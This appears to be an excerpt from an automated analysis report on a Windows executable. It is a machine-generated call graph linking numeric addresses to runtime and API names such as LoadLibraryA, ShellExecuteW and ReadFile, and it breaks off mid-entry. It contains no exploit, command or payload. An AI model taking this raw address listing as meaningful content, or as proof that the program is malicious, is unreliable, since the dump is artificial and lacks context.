__getptd_noexit 94238->94257 94242 647cf4 __lock 46 API calls 94239->94242 94240 647d9d 94255 641145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94240->94255 94245 647dda 94242->94245 94244 647dc9 94244->94237 94247 647dfe 94245->94247 94248 647de9 InitializeCriticalSectionAndSpinCount 94245->94248 94246->94231 94256 6469d0 47 API calls std::exception::_Copy_str 94246->94256 94258 641c9d 94247->94258 94249 647e04 94248->94249 94264 647e1a LeaveCriticalSection _doexit 94249->94264 94253->94234 94254->94240 94256->94235 94257->94244 94259 641ca6 RtlFreeHeap 94258->94259 94260 641ccf __dosmaperr 94258->94260 94259->94260 94261 641cbb 94259->94261 94260->94249 94265 647c0e 47 API calls __getptd_noexit 94261->94265 94263 641cc1 GetLastError 94263->94260 94264->94237 94265->94263 94266->94152 94267->94159 94268->94170 94270 646e2b 94269->94270 94275 646cb5 94270->94275 94274 646e46 94274->94173 94276 646ccf _memset __call_reportfault 94275->94276 94277 646cef IsDebuggerPresent 94276->94277 94283 6481ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94277->94283 94280 646db3 __call_reportfault 94284 64a70c 94280->94284 94281 646dd6 94282 648197 GetCurrentProcess TerminateProcess 94281->94282 94282->94274 94283->94280 94285 64a714 94284->94285 94286 64a716 IsProcessorFeaturePresent 94284->94286 94285->94281 94288 6537b0 94286->94288 94291 65375f 5 API calls 2 library calls 94288->94291 94290 653893 94290->94281 94291->94290 94292->94177 94294 647cf4 __lock 47 API calls 94293->94294 94295 641410 94294->94295 94358 647e58 LeaveCriticalSection 94295->94358 94297 623a88 94298 64146d 94297->94298 94299 641477 94298->94299 94300 641491 94298->94300 94299->94300 94359 647c0e 47 API calls __getptd_noexit 94299->94359 94300->94185 94302 641481 94360 646e10 8 API calls __cftof2_l 94302->94360 94304 64148c 94304->94185 94305->94187 94307 623d26 __ftell_nolock 94306->94307 94308 62d7f7 48 API calls 94307->94308 94309 623d31 GetCurrentDirectoryW 94308->94309 94361 6261ca 94309->94361 94311 623d57 IsDebuggerPresent 94312 623d65 94311->94312 94313 691cc1 MessageBoxA 94311->94313 94314 623e3a 94312->94314 94315 691cd9 94312->94315 94316 623d82 94312->94316 94313->94315 94317 623e41 SetCurrentDirectoryW 94314->94317 94537 63c682 48 API calls 94315->94537 94435 6240e5 94316->94435 94322 623e4e Mailbox 94317->94322 94321 623da0 GetFullPathNameW 94324 626a63 48 API calls 94321->94324 94322->94189 94323 691ce9 94326 691cff SetCurrentDirectoryW 94323->94326 94325 623ddb 94324->94325 94451 626430 94325->94451 94326->94322 94329 623df6 94330 623e00 94329->94330 94538 6671fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94329->94538 94467 623e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94330->94467 94333 691d1c 94333->94330 94336 691d2d 94333->94336 94338 625374 50 API calls 94336->94338 94337 623e0a 94339 623e1f 94337->94339 94342 624ffc 67 API calls 94337->94342 94341 691d35 94338->94341 94475 62e8d0 94339->94475 94344 62ce19 48 API calls 94341->94344 94342->94339 94345 691d42 94344->94345 94347 691d49 94345->94347 94348 691d6e 94345->94348 94349 62518c 48 API calls 94347->94349 94350 62518c 48 API calls 94348->94350 94351 691d54 94349->94351 94352 691d6a GetForegroundWindow ShellExecuteW 94350->94352 94353 62510d 48 API calls 94351->94353 94356 691d9e Mailbox 94352->94356 94355 691d61 94353->94355 94357 62518c 48 API calls 94355->94357 94356->94314 94357->94352 94358->94297 94359->94302 94360->94304 94539 63e99b 94361->94539 94365 6261eb 94366 625374 50 API calls 94365->94366 94367 6261ff 94366->94367 94368 62ce19 48 API calls 94367->94368 94369 62620c 94368->94369 94556 6239db 94369->94556 94371 626216 Mailbox 94372 626eed 48 API calls 94371->94372 94373 62622b 94372->94373 94568 629048 94373->94568 94376 62ce19 48 API calls 94377 626244 94376->94377 94571 62d6e9 94377->94571 94379 626254 Mailbox 94380 62ce19 48 API calls 94379->94380 94381 62627c 94380->94381 94382 62d6e9 55 API calls 94381->94382 94383 62628f Mailbox 94382->94383 94384 62ce19 48 API calls 94383->94384 94385 6262a0 94384->94385 94575 62d645 94385->94575 94387 6262b2 Mailbox 94388 62d7f7 48 API calls 94387->94388 94389 6262c5 94388->94389 94585 6263fc 94389->94585 94393 6262df 94394 691c08 94393->94394 94395 6262e9 94393->94395 94396 6263fc 48 API calls 94394->94396 94397 640fa7 _W_store_winword 59 API calls 94395->94397 94398 691c1c 94396->94398 94399 6262f4 94397->94399 94401 6263fc 48 API calls 94398->94401 94399->94398 94400 6262fe 94399->94400 94402 640fa7 _W_store_winword 59 API calls 94400->94402 94403 691c38 94401->94403 94404 626309 94402->94404 94407 625374 50 API calls 94403->94407 94404->94403 94405 626313 94404->94405 94406 640fa7 _W_store_winword 59 API calls 94405->94406 94408 62631e 94406->94408 94409 691c5d 94407->94409 94410 62635f 94408->94410 94412 691c86 94408->94412 94415 6263fc 48 API calls 94408->94415 94411 6263fc 48 API calls 94409->94411 94410->94412 94413 62636c 94410->94413 94414 691c69 94411->94414 94416 626eed 48 API calls 94412->94416 94420 63c050 48 API calls 94413->94420 94417 626eed 48 API calls 94414->94417 94418 626342 94415->94418 94419 691ca8 94416->94419 94421 691c77 94417->94421 94423 626eed 48 API calls 94418->94423 94424 6263fc 48 API calls 94419->94424 94425 626384 94420->94425 94422 6263fc 48 API calls 94421->94422 94422->94412 94426 626350 94423->94426 94427 691cb5 94424->94427 94428 631b90 48 API calls 94425->94428 94429 6263fc 48 API calls 94426->94429 94427->94427 94432 626394 94428->94432 94429->94410 94430 631b90 48 API calls 94430->94432 94432->94430 94433 6263fc 48 API calls 94432->94433 94434 6263d6 Mailbox 94432->94434 94601 626b68 48 API calls 94432->94601 94433->94432 94434->94311 94436 6240f2 __ftell_nolock 94435->94436 94437 69370e _memset 94436->94437 94438 62410b 94436->94438 94440 69372a GetOpenFileNameW 94437->94440 94439 62660f 49 API calls 94438->94439 94441 624114 94439->94441 94443 693779 94440->94443 95229 6240a7 94441->95229 94445 626a63 48 API calls 94443->94445 94447 69378e 94445->94447 94447->94447 94448 624129 95247 624139 94448->95247 94452 62643d __ftell_nolock 94451->94452 95449 624c75 94452->95449 94454 626442 94465 623dee 94454->94465 95460 625928 86 API calls 94454->95460 94456 62644f 94456->94465 95461 625798 88 API calls Mailbox 94456->95461 94458 626458 94459 62645c GetFullPathNameW 94458->94459 94458->94465 94460 626a63 48 API calls 94459->94460 94461 626488 94460->94461 94462 626a63 48 API calls 94461->94462 94463 626495 94462->94463 94464 626a63 48 API calls 94463->94464 94466 695dcf _wcscat 94463->94466 94464->94465 94465->94323 94465->94329 94468 691cba 94467->94468 94469 623ed8 94467->94469 95463 624024 94469->95463 94473 623e05 94474 6236b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94473->94474 94474->94337 94476 62e8f6 94475->94476 94500 62e906 Mailbox 94475->94500 94477 62ed52 94476->94477 94476->94500 95634 63e3cd 335 API calls 94477->95634 94478 66cc5c 86 API calls 94478->94500 94479 62ebc7 94481 623e2a 94479->94481 95635 622ff6 16 API calls 94479->95635 94481->94314 94536 623847 Shell_NotifyIconW _memset 94481->94536 94483 62ed63 94483->94481 94485 62ed70 94483->94485 94484 62e94c PeekMessageW 94484->94500 95636 63e312 335 API calls Mailbox 94485->95636 94487 69526e Sleep 94487->94500 94488 62ed77 LockWindowUpdate DestroyWindow GetMessageW 94488->94481 94489 62eda9 94488->94489 94491 6959ef TranslateMessage DispatchMessageW GetMessageW 94489->94491 94491->94491 94495 695a1f 94491->94495 94493 62ed21 PeekMessageW 94493->94500 94494 621caa 49 API calls 94494->94500 94495->94481 94496 62ebf7 timeGetTime 94496->94500 94498 63f4ea 48 API calls 94498->94500 94499 626eed 48 API calls 94499->94500 94500->94478 94500->94479 94500->94484 94500->94487 94500->94493 94500->94494 94500->94496 94500->94498 94500->94499 94501 62ed3a TranslateMessage DispatchMessageW 94500->94501 94502 695557 WaitForSingleObject 94500->94502 94505 69588f Sleep 94500->94505 94506 62edae timeGetTime 94500->94506 94509 695733 Sleep 94500->94509 94511 622aae 311 API calls 94500->94511 94517 695445 Sleep 94500->94517 94527 62fe30 311 API calls 94500->94527 94529 695429 Mailbox 94500->94529 94534 62d6e9 55 API calls 94500->94534 94535 62ce19 48 API calls 94500->94535 95468 62f110 94500->95468 95533 6345e0 94500->95533 95550 633200 94500->95550 95622 63e244 94500->95622 95627 63dc5f 94500->95627 95632 62eed0 335 API calls Mailbox 94500->95632 95633 62ef00 335 API calls 94500->95633 95638 688d23 48 API calls 94500->95638 94501->94493 94502->94500 94503 695574 GetExitCodeProcess CloseHandle 94502->94503 94503->94500 94504 62d7f7 48 API calls 94504->94529 94505->94529 95637 621caa 49 API calls 94506->95637 94509->94529 94511->94500 94513 63dc38 timeGetTime 94513->94529 94514 695926 GetExitCodeProcess 94515 69593c WaitForSingleObject 94514->94515 94516 695952 CloseHandle 94514->94516 94515->94500 94515->94516 94516->94529 94517->94500 94518 688c4b 108 API calls 94518->94529 94519 622c79 107 API calls 94519->94529 94521 695432 Sleep 94521->94517 94522 6959ae Sleep 94522->94500 94524 62ce19 48 API calls 94524->94529 94527->94500 94528 62d6e9 55 API calls 94528->94529 94529->94500 94529->94504 94529->94513 94529->94514 94529->94517 94529->94518 94529->94519 94529->94521 94529->94522 94529->94524 94529->94528 95639 664cbe 49 API calls Mailbox 94529->95639 95640 621caa 49 API calls 94529->95640 95641 622aae 335 API calls 94529->95641 95642 67ccb2 50 API calls 94529->95642 95643 667a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94529->95643 95644 666532 63 API calls 3 library calls 94529->95644 94534->94500 94535->94500 94536->94314 94537->94323 94538->94333 94540 62d7f7 48 API calls 94539->94540 94541 6261db 94540->94541 94542 626009 94541->94542 94543 626016 __ftell_nolock 94542->94543 94544 626a63 48 API calls 94543->94544 94549 62617c Mailbox 94543->94549 94546 626048 94544->94546 94555 62607e Mailbox 94546->94555 94602 6261a6 94546->94602 94547 6261a6 48 API calls 94547->94555 94548 62614f 94548->94549 94550 62ce19 48 API calls 94548->94550 94549->94365 94551 626170 94550->94551 94553 6264cf 48 API calls 94551->94553 94552 62ce19 48 API calls 94552->94555 94553->94549 94554 6264cf 48 API calls 94554->94555 94555->94547 94555->94548 94555->94549 94555->94552 94555->94554 94605 6241a9 94556->94605 94558 623a06 94558->94371 94562 692ff0 94564 641c9d _free 47 API calls 94562->94564 94565 692ffd 94564->94565 94566 624252 84 API calls 94565->94566 94567 693006 94566->94567 94567->94567 94569 63f4ea 48 API calls 94568->94569 94570 626237 94569->94570 94570->94376 94572 62d6f4 94571->94572 94573 62d71b 94572->94573 95222 62d764 55 API calls 94572->95222 94573->94379 94576 62d654 94575->94576 94584 62d67e 94575->94584 94577 62d65b 94576->94577 94581 62d6c2 94576->94581 94578 62d6ab 94577->94578 94579 62d666 94577->94579 94578->94584 95224 63dce0 53 API calls 94578->95224 95223 62d9a0 53 API calls __cinit 94579->95223 94581->94578 95225 63dce0 53 API calls 94581->95225 94584->94387 94586 626406 94585->94586 94587 62641f 94585->94587 94588 626eed 48 API calls 94586->94588 94589 626a63 48 API calls 94587->94589 94590 6262d1 94588->94590 94589->94590 94591 640fa7 94590->94591 94592 640fb3 94591->94592 94593 641028 94591->94593 94600 640fd8 94592->94600 95226 647c0e 47 API calls __getptd_noexit 94592->95226 95228 64103a 59 API calls 4 library calls 94593->95228 94596 641035 94596->94393 94597 640fbf 95227 646e10 8 API calls __cftof2_l 94597->95227 94599 640fca 94599->94393 94600->94393 94601->94432 94603 62bdfa 48 API calls 94602->94603 94604 6261b1 94603->94604 94604->94546 94670 624214 94605->94670 94610 6241d4 LoadLibraryExW 94680 624291 94610->94680 94611 694f73 94613 624252 84 API calls 94611->94613 94615 694f7a 94613->94615 94617 624291 3 API calls 94615->94617 94619 694f82 94617->94619 94618 6241fb 94618->94619 94620 624207 94618->94620 94706 6244ed 94619->94706 94622 624252 84 API calls 94620->94622 94624 6239fe 94622->94624 94624->94558 94629 66c396 94624->94629 94626 694fa9 94714 624950 94626->94714 94628 694fb6 94630 624517 83 API calls 94629->94630 94631 66c405 94630->94631 95007 66c56d 94631->95007 94634 6244ed 64 API calls 94635 66c432 94634->94635 94636 6244ed 64 API calls 94635->94636 94637 66c442 94636->94637 94638 6244ed 64 API calls 94637->94638 94639 66c45d 94638->94639 94640 6244ed 64 API calls 94639->94640 94641 66c478 94640->94641 94642 624517 83 API calls 94641->94642 94643 66c48f 94642->94643 94644 64395c std::exception::_Copy_str 47 API calls 94643->94644 94645 66c496 94644->94645 94646 64395c std::exception::_Copy_str 47 API calls 94645->94646 94647 66c4a0 94646->94647 94648 6244ed 64 API calls 94647->94648 94649 66c4b4 94648->94649 94650 66bf5a GetSystemTimeAsFileTime 94649->94650 94651 66c4c7 94650->94651 94652 66c4f1 94651->94652 94653 66c4dc 94651->94653 94655 66c556 94652->94655 94656 66c4f7 94652->94656 94654 641c9d _free 47 API calls 94653->94654 94657 66c4e2 94654->94657 94659 641c9d _free 47 API calls 94655->94659 95013 66b965 94656->95013 94660 641c9d _free 47 API calls 94657->94660 94662 66c41b 94659->94662 94660->94662 94662->94562 94664 624252 94662->94664 94663 641c9d _free 47 API calls 94663->94662 94665 62425c 94664->94665 94667 624263 94664->94667 94666 6435e4 __fcloseall 83 API calls 94665->94666 94666->94667 94668 624272 94667->94668 94669 624283 FreeLibrary 94667->94669 94668->94562 94669->94668 94719 624339 94670->94719 94673 62423c 94675 624244 FreeLibrary 94673->94675 94676 6241bb 94673->94676 94675->94676 94677 643499 94676->94677 94727 6434ae 94677->94727 94679 6241c8 94679->94610 94679->94611 94806 6242e4 94680->94806 94683 6242b8 94685 6242c1 FreeLibrary 94683->94685 94686 6241ec 94683->94686 94685->94686 94687 624380 94686->94687 94688 63f4ea 48 API calls 94687->94688 94689 624395 94688->94689 94690 6247b7 48 API calls 94689->94690 94691 6243a1 _memcpy_s 94690->94691 94692 6243dc 94691->94692 94694 6244d1 94691->94694 94695 624499 94691->94695 94693 624950 57 API calls 94692->94693 94701 6243e5 94693->94701 94825 66c750 93 API calls 94694->94825 94814 62406b CreateStreamOnHGlobal 94695->94814 94698 6244ed 64 API calls 94698->94701 94700 624479 94700->94618 94701->94698 94701->94700 94702 694ed7 94701->94702 94820 624517 94701->94820 94703 624517 83 API calls 94702->94703 94704 694eeb 94703->94704 94705 6244ed 64 API calls 94704->94705 94705->94700 94707 694fc0 94706->94707 94708 6244ff 94706->94708 94849 64381e 94708->94849 94711 66bf5a 94984 66bdb4 94711->94984 94713 66bf70 94713->94626 94715 62495f 94714->94715 94718 695002 94714->94718 94989 643e65 94715->94989 94717 624967 94717->94628 94723 62434b 94719->94723 94722 624321 LoadLibraryA GetProcAddress 94722->94673 94724 62422f 94723->94724 94725 624354 LoadLibraryA 94723->94725 94724->94673 94724->94722 94725->94724 94726 624365 GetProcAddress 94725->94726 94726->94724 94728 6434ba _flsall 94727->94728 94729 6434cd 94728->94729 94731 6434fe 94728->94731 94775 647c0e 47 API calls __getptd_noexit 94729->94775 94746 64e4c8 94731->94746 94732 6434d2 94776 646e10 8 API calls __cftof2_l 94732->94776 94735 643503 94736 64350c 94735->94736 94737 643519 94735->94737 94777 647c0e 47 API calls __getptd_noexit 94736->94777 94739 643543 94737->94739 94740 643523 94737->94740 94760 64e5e0 94739->94760 94778 647c0e 47 API calls __getptd_noexit 94740->94778 94742 6434dd _flsall @_EH4_CallFilterFunc@8 94742->94679 94747 64e4d4 _flsall 94746->94747 94748 647cf4 __lock 47 API calls 94747->94748 94749 64e4e2 94748->94749 94750 64e559 94749->94750 94756 647d7c __mtinitlocknum 47 API calls 94749->94756 94758 64e552 94749->94758 94783 644e5b 48 API calls __lock 94749->94783 94784 644ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94749->94784 94785 6469d0 47 API calls std::exception::_Copy_str 94750->94785 94753 64e560 94754 64e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94753->94754 94753->94758 94754->94758 94755 64e5cc _flsall 94755->94735 94756->94749 94780 64e5d7 94758->94780 94769 64e600 __wopenfile 94760->94769 94761 64e61a 94790 647c0e 47 API calls __getptd_noexit 94761->94790 94762 64e7d5 94762->94761 94766 64e838 94762->94766 94764 64e61f 94791 646e10 8 API calls __cftof2_l 94764->94791 94787 6563c9 94766->94787 94767 64354e 94779 643570 LeaveCriticalSection LeaveCriticalSection _fprintf 94767->94779 94769->94761 94769->94762 94792 64185b 59 API calls 3 library calls 94769->94792 94771 64e7ce 94771->94762 94793 64185b 59 API calls 3 library calls 94771->94793 94773 64e7ed 94773->94762 94794 64185b 59 API calls 3 library calls 94773->94794 94775->94732 94776->94742 94777->94742 94778->94742 94779->94742 94786 647e58 LeaveCriticalSection 94780->94786 94782 64e5de 94782->94755 94783->94749 94784->94749 94785->94753 94786->94782 94795 655bb1 94787->94795 94789 6563e2 94789->94767 94790->94764 94791->94767 94792->94771 94793->94773 94794->94762 94796 655bbd _flsall 94795->94796 94797 655bcf 94796->94797 94799 655c06 94796->94799 94798 647c0e ___libm_error_support 47 API calls 94797->94798 94800 655bd4 94798->94800 94801 655c78 __wsopen_helper 110 API calls 94799->94801 94802 646e10 __cftof2_l 8 API calls 94800->94802 94803 655c23 94801->94803 94805 655bde _flsall 94802->94805 94804 655c4c __wsopen_helper LeaveCriticalSection 94803->94804 94804->94805 94805->94789 94810 6242f6 94806->94810 94809 6242cc LoadLibraryA GetProcAddress 94809->94683 94811 6242aa 94810->94811 94812 6242ff LoadLibraryA 94810->94812 94811->94683 94811->94809 94812->94811 94813 624310 GetProcAddress 94812->94813 94813->94811 94815 624085 FindResourceExW 94814->94815 94819 6240a2 94814->94819 94816 694f16 LoadResource 94815->94816 94815->94819 94817 694f2b SizeofResource 94816->94817 94816->94819 94818 694f3f LockResource 94817->94818 94817->94819 94818->94819 94819->94692 94821 624526 94820->94821 94822 694fe0 94820->94822 94826 643a8d 94821->94826 94824 624534 94824->94701 94825->94692 94829 643a99 _flsall 94826->94829 94827 643aa7 94839 647c0e 47 API calls __getptd_noexit 94827->94839 94829->94827 94830 643acd 94829->94830 94841 644e1c 94830->94841 94831 643aac 94840 646e10 8 API calls __cftof2_l 94831->94840 94834 643ad3 94847 6439fe 81 API calls 4 library calls 94834->94847 94836 643ae2 94848 643b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94836->94848 94838 643ab7 _flsall 94838->94824 94839->94831 94840->94838 94842 644e2c 94841->94842 94843 644e4e EnterCriticalSection 94841->94843 94842->94843 94844 644e34 94842->94844 94845 644e44 94843->94845 94846 647cf4 __lock 47 API calls 94844->94846 94845->94834 94846->94845 94847->94836 94848->94838 94852 643839 94849->94852 94851 624510 94851->94711 94853 643845 _flsall 94852->94853 94854 643888 94853->94854 94855 64385b _memset 94853->94855 94856 643880 _flsall 94853->94856 94857 644e1c __lock_file 48 API calls 94854->94857 94879 647c0e 47 API calls __getptd_noexit 94855->94879 94856->94851 94858 64388e 94857->94858 94865 64365b 94858->94865 94861 643875 94880 646e10 8 API calls __cftof2_l 94861->94880 94869 643676 _memset 94865->94869 94872 643691 94865->94872 94866 643681 94980 647c0e 47 API calls __getptd_noexit 94866->94980 94868 643686 94981 646e10 8 API calls __cftof2_l 94868->94981 94869->94866 94869->94872 94877 6436cf 94869->94877 94881 6438c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94872->94881 94873 6437e0 _memset 94983 647c0e 47 API calls __getptd_noexit 94873->94983 94877->94872 94877->94873 94882 642933 94877->94882 94889 64ee0e 94877->94889 94960 64eb66 94877->94960 94982 64ec87 47 API calls 4 library calls 94877->94982 94879->94861 94880->94856 94881->94856 94883 642952 94882->94883 94884 64293d 94882->94884 94883->94877 94885 647c0e ___libm_error_support 47 API calls 94884->94885 94886 642942 94885->94886 94887 646e10 __cftof2_l 8 API calls 94886->94887 94888 64294d 94887->94888 94888->94877 94890 64ee46 94889->94890 94891 64ee2f 94889->94891 94892 64f57e 94890->94892 94896 64ee80 94890->94896 94893 647bda __lseeki64 47 API calls 94891->94893 94894 647bda __lseeki64 47 API calls 94892->94894 94895 64ee34 94893->94895 94897 64f583 94894->94897 94898 647c0e ___libm_error_support 47 API calls 94895->94898 94899 64ee88 94896->94899 94906 64ee9f 94896->94906 94900 647c0e ___libm_error_support 47 API calls 94897->94900 94941 64ee3b 94898->94941 94901 647bda __lseeki64 47 API calls 94899->94901 94902 64ee94 94900->94902 94903 64ee8d 94901->94903 94904 646e10 __cftof2_l 8 API calls 94902->94904 94908 647c0e ___libm_error_support 47 API calls 94903->94908 94904->94941 94905 64eeb4 94909 647bda __lseeki64 47 API calls 94905->94909 94906->94905 94907 64eece 94906->94907 94910 64eeec 94906->94910 94906->94941 94907->94905 94913 64eed9 94907->94913 94908->94902 94909->94903 94912 6469d0 __malloc_crt 47 API calls 94910->94912 94914 64eefc 94912->94914 94915 653bf2 __stbuf 47 API calls 94913->94915 94917 64ef04 94914->94917 94918 64ef1f 94914->94918 94916 64efed 94915->94916 94919 64f066 ReadFile 94916->94919 94922 64f003 GetConsoleMode 94916->94922 94921 647c0e ___libm_error_support 47 API calls 94917->94921 94920 64f82f __lseeki64_nolock 49 API calls 94918->94920 94924 64f546 GetLastError 94919->94924 94925 64f088 94919->94925 94923 64ef2d 94920->94923 94926 64ef09 94921->94926 94927 64f017 94922->94927 94928 64f063 94922->94928 94923->94913 94929 64f553 94924->94929 94930 64f046 94924->94930 94925->94924 94933 64f058 94925->94933 94931 647bda __lseeki64 47 API calls 94926->94931 94927->94928 94935 64f01d ReadConsoleW 94927->94935 94928->94919 94932 647c0e ___libm_error_support 47 API calls 94929->94932 94938 647bed __dosmaperr 47 API calls 94930->94938 94944 64f04c 94930->94944 94934 64ef14 94931->94934 94936 64f558 94932->94936 94940 64f0bd 94933->94940 94943 64f32a 94933->94943 94933->94944 94934->94941 94935->94933 94937 64f040 GetLastError 94935->94937 94939 647bda __lseeki64 47 API calls 94936->94939 94937->94930 94938->94944 94939->94944 94946 64f129 ReadFile 94940->94946 94953 64f1aa 94940->94953 94941->94877 94942 641c9d _free 47 API calls 94942->94941 94943->94944 94950 64f430 ReadFile 94943->94950 94944->94941 94944->94942 94947 64f14a GetLastError 94946->94947 94959 64f154 94946->94959 94947->94959 94948 64f267 94954 64f217 MultiByteToWideChar 94948->94954 94955 64f82f __lseeki64_nolock 49 API calls 94948->94955 94949 64f257 94951 647c0e ___libm_error_support 47 API calls 94949->94951 94952 64f453 GetLastError 94950->94952 94958 64f461 94950->94958 94951->94944 94952->94958 94953->94944 94953->94948 94953->94949 94953->94954 94954->94937 94954->94944 94955->94954 94956 64f82f __lseeki64_nolock 49 API calls 94956->94959 94957 64f82f __lseeki64_nolock 49 API calls 94957->94958 94958->94943 94958->94957 94959->94940 94959->94956 94961 64eb71 94960->94961 94965 64eb86 94960->94965 94962 647c0e ___libm_error_support 47 API calls 94961->94962 94963 64eb76 94962->94963 94964 646e10 __cftof2_l 8 API calls 94963->94964 94973 64eb81 94964->94973 94966 64ebbb 94965->94966 94967 653e24 __getbuf 47 API calls 94965->94967 94965->94973 94968 642933 __fseek_nolock 47 API calls 94966->94968 94967->94966 94969 64ebcf 94968->94969 94970 64ed06 __filbuf 62 API calls 94969->94970 94971 64ebd6 94970->94971 94972 642933 __fseek_nolock 47 API calls 94971->94972 94971->94973 94974 64ebf9 94972->94974 94973->94877 94974->94973 94975 642933 __fseek_nolock 47 API calls 94974->94975 94976 64ec05 94975->94976 94976->94973 94977 642933 __fseek_nolock 47 API calls 94976->94977 94978 64ec12 94977->94978 94979 642933 __fseek_nolock 47 API calls 94978->94979 94979->94973 94980->94868 94981->94872 94982->94877 94983->94868 94987 64344a GetSystemTimeAsFileTime 94984->94987 94986 66bdc3 94986->94713 94988 643478 __aulldiv 94987->94988 94988->94986 94990 643e71 _flsall 94989->94990 94991 643e94 94990->94991 94992 643e7f 94990->94992 94993 644e1c __lock_file 48 API calls 94991->94993 95003 647c0e 47 API calls __getptd_noexit 94992->95003 94995 643e9a 94993->94995 95005 643b0c 55 API calls 6 library calls 94995->95005 94996 643e84 95004 646e10 8 API calls __cftof2_l 94996->95004 94999 643ea5 95006 643ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94999->95006 95001 643eb7 95002 643e8f _flsall 95001->95002 95002->94717 95003->94996 95004->95002 95005->94999 95006->95001 95011 66c581 __tzset_nolock _wcscmp 95007->95011 95008 66c417 95008->94634 95008->94662 95009 6244ed 64 API calls 95009->95011 95010 66bf5a GetSystemTimeAsFileTime 95010->95011 95011->95008 95011->95009 95011->95010 95012 624517 83 API calls 95011->95012 95012->95011 95014 66b970 95013->95014 95015 66b97e 95013->95015 95016 643499 117 API calls 95014->95016 95017 643499 117 API calls 95015->95017 95018 66b9c3 95015->95018 95043 66b987 95015->95043 95016->95015 95019 66b9a8 95017->95019 95044 66bbe8 95018->95044 95019->95018 95021 66b9b1 95019->95021 95025 6435e4 __fcloseall 83 API calls 95021->95025 95021->95043 95022 66ba07 95023 66ba2c 95022->95023 95024 66ba0b 95022->95024 95048 66b7e5 95023->95048 95027 66ba18 95024->95027 95029 6435e4 __fcloseall 83 API calls 95024->95029 95025->95043 95030 6435e4 __fcloseall 83 API calls 95027->95030 95027->95043 95029->95027 95030->95043 95031 66ba5a 95057 66ba8a 95031->95057 95032 66ba3a 95034 66ba47 95032->95034 95036 6435e4 __fcloseall 83 API calls 95032->95036 95038 6435e4 __fcloseall 83 API calls 95034->95038 95034->95043 95036->95034 95038->95043 95040 66ba75 95042 6435e4 __fcloseall 83 API calls 95040->95042 95040->95043 95042->95043 95043->94663 95045 66bc0d 95044->95045 95047 66bbf6 _memcpy_s __tzset_nolock 95044->95047 95046 64381e __fread_nolock 64 API calls 95045->95046 95046->95047 95047->95022 95049 64395c std::exception::_Copy_str 47 API calls 95048->95049 95050 66b7f4 95049->95050 95051 64395c std::exception::_Copy_str 47 API calls 95050->95051 95052 66b808 95051->95052 95053 64395c std::exception::_Copy_str 47 API calls 95052->95053 95054 66b81c 95053->95054 95055 66bb64 47 API calls 95054->95055 95056 66b82f 95054->95056 95055->95056 95056->95031 95056->95032 95063 66baa0 95057->95063 95058 66bb51 95090 66bd8a 95058->95090 95059 66b841 64 API calls 95059->95063 95061 66ba61 95065 66bb64 95061->95065 95063->95058 95063->95059 95063->95061 95086 66bc67 95063->95086 95094 66b942 64 API calls 95063->95094 95066 66bb71 95065->95066 95067 66bb77 95065->95067 95068 641c9d _free 47 API calls 95066->95068 95069 66bb88 95067->95069 95070 641c9d _free 47 API calls 95067->95070 95068->95067 95071 66ba68 95069->95071 95072 641c9d _free 47 API calls 95069->95072 95070->95069 95071->95040 95073 6435e4 95071->95073 95072->95071 95074 6435f0 _flsall 95073->95074 95075 643604 95074->95075 95076 64361c 95074->95076 95128 647c0e 47 API calls __getptd_noexit 95075->95128 95078 644e1c __lock_file 48 API calls 95076->95078 95082 643614 _flsall 95076->95082 95080 64362e 95078->95080 95079 643609 95129 646e10 8 API calls __cftof2_l 95079->95129 95112 643578 95080->95112 95082->95040 95087 66bc76 95086->95087 95088 66bcb6 95086->95088 95087->95063 95088->95087 95095 66bd3d 95088->95095 95091 66bd97 95090->95091 95092 66bda8 95090->95092 95093 642aae 80 API calls 95091->95093 95092->95061 95093->95092 95094->95063 95096 66bd7a 95095->95096 95097 66bd69 95095->95097 95096->95088 95099 642aae 95097->95099 95100 642aba _flsall 95099->95100 95101 642ad4 95100->95101 95102 642aec 95100->95102 95104 642ae4 _flsall 95100->95104 95103 647c0e ___libm_error_support 47 API calls 95101->95103 95105 644e1c __lock_file 48 API calls 95102->95105 95106 642ad9 95103->95106 95104->95096 95107 642af2 95105->95107 95108 646e10 __cftof2_l 8 API calls 95106->95108 95109 642957 78 API calls 95107->95109 95108->95104 95110 642b06 95109->95110 95111 642b24 LeaveCriticalSection LeaveCriticalSection 95110->95111 95111->95104 95113 643587 95112->95113 95114 64359b 95112->95114 95164 647c0e 47 API calls __getptd_noexit 95113->95164 95126 643597 95114->95126 95131 642c84 95114->95131 95116 64358c 95165 646e10 8 API calls __cftof2_l 95116->95165 95122 642933 __fseek_nolock 47 API calls 95123 6435b5 95122->95123 95141 64e9d2 95123->95141 95125 6435bb 95125->95126 95127 641c9d _free 47 API calls 95125->95127 95130 643653 LeaveCriticalSection LeaveCriticalSection _fprintf 95126->95130 95127->95126 95128->95079 95129->95082 95130->95082 95132 642c97 95131->95132 95136 642cbb 95131->95136 95133 642933 __fseek_nolock 47 API calls 95132->95133 95132->95136 95134 642cb4 95133->95134 95166 64af61 95134->95166 95137 64eb36 95136->95137 95138 64eb43 95137->95138 95140 6435af 95137->95140 95139 641c9d _free 47 API calls 95138->95139 95138->95140 95139->95140 95140->95122 95142 64e9de _flsall 95141->95142 95143 64e9e6 95142->95143 95144 64e9fe 95142->95144 95215 647bda 47 API calls __getptd_noexit 95143->95215 95146 64ea7b 95144->95146 95151 64ea28 95144->95151 95219 647bda 47 API calls __getptd_noexit 95146->95219 95147 64e9eb 95216 647c0e 47 API calls __getptd_noexit 95147->95216 95150 64ea80 95220 647c0e 47 API calls __getptd_noexit 95150->95220 95191 64a8ed 95151->95191 95154 64ea88 95221 646e10 8 API calls __cftof2_l 95154->95221 95155 64ea2e 95157 64ea41 95155->95157 95158 64ea4c 95155->95158 95200 64ea9c 95157->95200 95217 647c0e 47 API calls __getptd_noexit 95158->95217 95159 64e9f3 _flsall 95159->95125 95162 64ea47 95218 64ea73 LeaveCriticalSection __unlock_fhandle 95162->95218 95164->95116 95165->95126 95167 64af6d 